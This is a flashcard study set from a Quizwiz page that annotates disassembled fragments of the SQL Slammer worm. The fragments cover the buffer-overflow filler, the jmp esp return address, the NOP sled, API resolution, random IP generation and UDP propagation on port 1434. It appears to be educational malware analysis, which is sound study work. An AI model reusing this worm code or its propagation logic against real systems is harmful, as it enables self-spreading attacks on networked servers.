SQL Slammer

Réussis tes devoirs et examens dès maintenant avec Quizwiz!

add al, 1 add [ecx], eax add [ecx], eax.... add esp, ebx leave mov al, 42h ; 'B' jmp short loc_75 add [ecx], eax add [ecx], eax add [ecx], eax add [eax-52h], esi inc edx

add al, 1 add [ecx], eax ; 02 - 5E is used to fill up memory so we can cause buffer overflow (filler to generate buffer overflow) add [ecx], eax... add esp, ebx leave ; stack is restored mov al, 42h ; 'B' ; goes to sqlsort so we can use the jmp esp jmp short loc_75 ; jumps to jmp esp add [ecx], eax add [ecx], eax add [ecx], eax add [eax-52h], esi inc edx add [eax-52h], esi inc edx

call dword ptr [esi] call eax xor ecx, ecx push ecx push ecx push eax

call dword ptr [esi] ; GetProcAddress with parameters - handle, GetTickCount call eax ; GetTickCount is called xor ecx, ecx ; Value of ecx is set to 0 push ecx ; 4 bytes of space for local variable push ecx ; 4 bytes of space for local variable push eax ; return value of GetTickCount is pushed onto stack- which is number of milliseconds since the system was last started. ; Used as parameter for Random generation later

loc_75: nop nop nop nop nop push 42B0C9DCh mov eax, 1010101h xor ecx, ecx mov cl, 18h loc_8B: push eax loop loc_8B xor eax, 5010101h push eax mov ebp, esp push ecx push 6C6C642Eh push 32336C65h push 6E72656Bh

loc_75: nop ; nop sled indicates beginning of worm code nop nop nop nop push 42B0C9DCh ; This is the jmp esp used for sqlsort.dll mov eax, 1010101h ; 10101010h is in the register eax xor ecx, ecx ; Value of ecx is set to 0 by xor mov cl, 18h ; counter = 18h = 24 in decimal loc_8B: ; CODE XREF: seg000:0000008C↓j push eax ; counter pushed on stack for loop loop loc_8B ; looped 18 times, decremented by 1 each time xor eax, 5010101h ; 0x1010101h xor 0x5010101h = 0x04000000 ; 0x04 is the request for the payload,lets us know payload is coming after this push eax ; load eax onto the stack mov ebp, esp ; stack base pointer is initialized push ecx ; pushed on stack push 6C6C642Eh ; In ASCII, this translates to ".dll" push 32336C65h ; In ASCII, this translates to "el32" push 6E72656Bh ; In ASCII, this translates to "kern" ( basically kernel32.dll) ; kernel32.dll string is pushed onto the stack

seg000:0000015D mov [ebp-4Ch], eax push 10h lea eax, [ebp-50h] push eax xor ecx, ecx push ecx xor cx, 178h push ecx lea eax, [ebp+3] push eax mov eax, [ebp-54h] push eax call esi jmp short loc_142

mov [ebp-4Ch], eax ; store generated random# as IP address push 10h ; 16 bytes length lea eax, [ebp-50h] ; load the address of the socket push eax ; push it onto the stack for later use xor ecx, ecx ; ecx = 0 push ecx ; push it onto the stack for later use xor cx, 178h ; the length of the payload being sent is 376 bytes push ecx ; push it onto the stack for later use lea eax, [ebp+3] ; load the address of the payload push eax ; push it onto the stack for later use mov eax, [ebp-54h] ; load the socket descriptor push eax ; push it onto the stack for later use call esi ; Call sendto function with all the parameters on stack jmp short loc_142 ; Send to other random addresses

xor ecx, 9B040103h xor ecx, 1010101h push ecx lea eax, [ebp-34h] push eax mov eax, [ebp-40h] push eax call dword ptr [esi] push 11h push 2 push 2 call eax

xor ecx, 9B040103h ; xor to get udp port xor ecx, 1010101h ; 0x9B040103 xor 0x1010101 = 9A050002 push ecx ; 0x9A050002 = port 1434( UDP port which sends UDP packet) lea eax, [ebp-34h] ; loads address of string socket into eax as parameter for GetProcAddress push eax ; Parameter is pushed onto the stack for GetProcAddress mov eax, [ebp-40h] ; loads address of string ws2_32.dll into eax as parameter for GetProcAddress push eax ; Parameter is pushed onto the stack for GetProcAddress call dword ptr [esi] ; GetProcAddress is called with socket and ws2_32.dll as parameters push 11h ; UDP push 2 ; Datagram socket push 2 ; AF_INET call eax ; socket called with above


Ensembles d'études connexes

MATERNAL FINAL w correct answers

View Set

Ch 24 Muscles of the Superficial Back, Shoulder, and Axilla

View Set

Chapter 14: Energy Generation in Mitochondria and Chloroplast

View Set

Chapter 3: Health, Illness, Disparities

View Set

AP Biology Chapters 3 Terms and Review

View Set

Chapter 12: Growth Theory Macro Econ

View Set

superficial back muscles: O,I,NS,A,BS

View Set

Proteins and Enzymes Quiz Study Guide

View Set

Series 7 - Options: Equity (Stock) Options

View Set